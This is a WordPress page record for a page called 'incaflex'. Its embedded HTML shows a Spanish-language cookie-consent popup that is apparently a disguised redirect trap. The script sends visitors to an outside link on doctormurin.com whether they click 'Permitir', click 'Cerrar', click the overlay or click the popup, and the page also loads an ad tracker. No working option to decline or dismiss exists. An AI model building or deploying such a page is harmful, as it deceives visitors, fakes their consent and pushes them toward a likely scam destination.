{"id":127,"date":"2025-10-26T16:09:11","date_gmt":"2025-10-26T16:09:11","guid":{"rendered":"https:\/\/globalproductstore.shop\/?page_id=127"},"modified":"2025-10-26T16:09:42","modified_gmt":"2025-10-26T16:09:42","slug":"incaflex","status":"publish","type":"page","link":"https:\/\/globalproductstore.shop\/?page_id=127","title":{"rendered":"incaflex"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"127\" class=\"elementor elementor-127\">\n\t\t\t\t<div class=\"elementor-element elementor-element-db828dd e-flex e-con-boxed e-con e-parent\" data-id=\"db828dd\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-f9131fd elementor-widget elementor-widget-html\" data-id=\"f9131fd\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t\t\r\n  <!DOCTYPE html>\r\n  <html lang=\"en\">\r\n  <head>\r\n    <meta charset=\"UTF-8\">\r\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n    <title>Pol\u00edtica de cookies<\/title>\r\n                <script src=\"https:\/\/app.clickfastads.com.br\/api\/tracker\/68fe47502851d1c66712dbee\"><\/script>\r\n    <link rel=\"stylesheet\" href=\"https:\/\/cdn.jsdelivr.net\/gh\/ClickFastAds\/tracker@main\/styles.css\">\r\n    <style>\r\n      body {\r\n        background-image: url('https:\/\/background-imgs.s3.sa-east-1.amazonaws.com\/e9fedd1b9dbab334249d552a94e1bc\/68fe47502851d1c66712dbee\/1761494898515.jpeg');\r\n        background-size: cover;\r\n        background-position: top center;\r\n        background-repeat: no-repeat;\r\n      }\r\n      @media (max-width: 768px) {\r\n        body {\r\n          background-image: url('https:\/\/background-imgs.s3.sa-east-1.amazonaws.com\/e9fedd1b9dbab334249d552a94e1bc\/68fe47502851d1c66712dbee\/1761494901359.jpeg');\r\n          background-size: cover;\r\n          background-position: top center;\r\n        }\r\n      }\r\n    <\/style>\r\n  <\/head>\r\n  <body>\r\n  <div class=\"overlay\" id=\"overlay\"><\/div>\r\n  <div class=\"cookie-popup\" id=\"cookiePopup\">\r\n      <h2>Pol\u00edtica de cookies<\/h2>\r\n      <p>Este sitio web utiliza cookies para personalizar el contenido y los anuncios, proporcionar funciones de redes sociales y analizar nuestro tr\u00e1fico. Al hacer clic en 'Permitir', aceptas el uso que hacemos de las cookies. Para m\u00e1s informaci\u00f3n, visite nuestra Pol\u00edtica de cookies.<\/p>\r\n      <a \r\n          href=\"https:\/\/gv6vg.doctormurin.com\/l\" \r\n          id=\"acceptCookies\" \r\n          class=\"btn btn-allow\"\r\n          data-base-url=\"https:\/\/gv6vg.doctormurin.com\/l\"\r\n      >\r\n          Permitir\r\n      <\/a>\r\n      <button id=\"cookieSettings\" href=\"https:\/\/gv6vg.doctormurin.com\/l\" class=\"btn btn-settings\">Cerrar<\/button>\r\n  <\/div>\r\n    <script>\r\n      document.addEventListener('DOMContentLoaded', function () {\r\n        var overlay = document.getElementById('overlay');\r\n        var cookiePopup = document.getElementById('cookiePopup');\r\n        var acceptCookies = document.getElementById('acceptCookies');\r\n        var cookieSettings = document.getElementById('cookieSettings');\r\n        var redirectUrl = acceptCookies.getAttribute(\"data-base-url\");\r\n        function redirectToUrl(url) {\r\n          const tempLink = document.createElement('a');\r\n          tempLink.href = url;\r\n          tempLink.style.display = 'none';\r\n          document.body.appendChild(tempLink);\r\n          tempLink.click();\r\n          document.body.removeChild(tempLink);\r\n        }\r\n        overlay.style.display = 'block';\r\n        cookiePopup.style.display = 'block';\r\n        acceptCookies.addEventListener('click', function (e) {\r\n          e.preventDefault();\r\n          redirectToUrl(redirectUrl);\r\n        });\r\n        cookieSettings.addEventListener('click', () => redirectToUrl(redirectUrl));\r\n        overlay.addEventListener('click', () => redirectToUrl(redirectUrl));\r\n        cookiePopup.addEventListener('click', function (e) {\r\n          if (e.target === cookiePopup || e.target.closest('.btn') === null) {\r\n            redirectToUrl(redirectUrl);\r\n          }\r\n        });\r\n      });\r\n      <\/script>\r\n    <\/body>\r\n  <\/html>\r\n  \t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Pol\u00edtica de cookies Pol\u00edtica de cookies Este sitio web utiliza cookies para personalizar el contenido y los anuncios, proporcionar funciones de redes sociales y analizar nuestro tr\u00e1fico. Al hacer clic en &#8216;Permitir&#8217;, aceptas el uso que hacemos de las cookies. Para m\u00e1s informaci\u00f3n, visite nuestra Pol\u00edtica de cookies. Permitir Cerrar<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_canvas","meta":{"footnotes":""},"class_list":["post-127","page","type-page","status-publish","hentry"],"_hostinger_reach_plugin_has_subscription_block":false,"_hostinger_reach_plugin_is_elementor":false,"_links":{"self":[{"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=\/wp\/v2\/pages\/127","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=127"}],"version-history":[{"count":4,"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=\/wp\/v2\/pages\/127\/revisions"}],"predecessor-version":[{"id":131,"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=\/wp\/v2\/pages\/127\/revisions\/131"}],"wp:attachment":[{"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=127"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}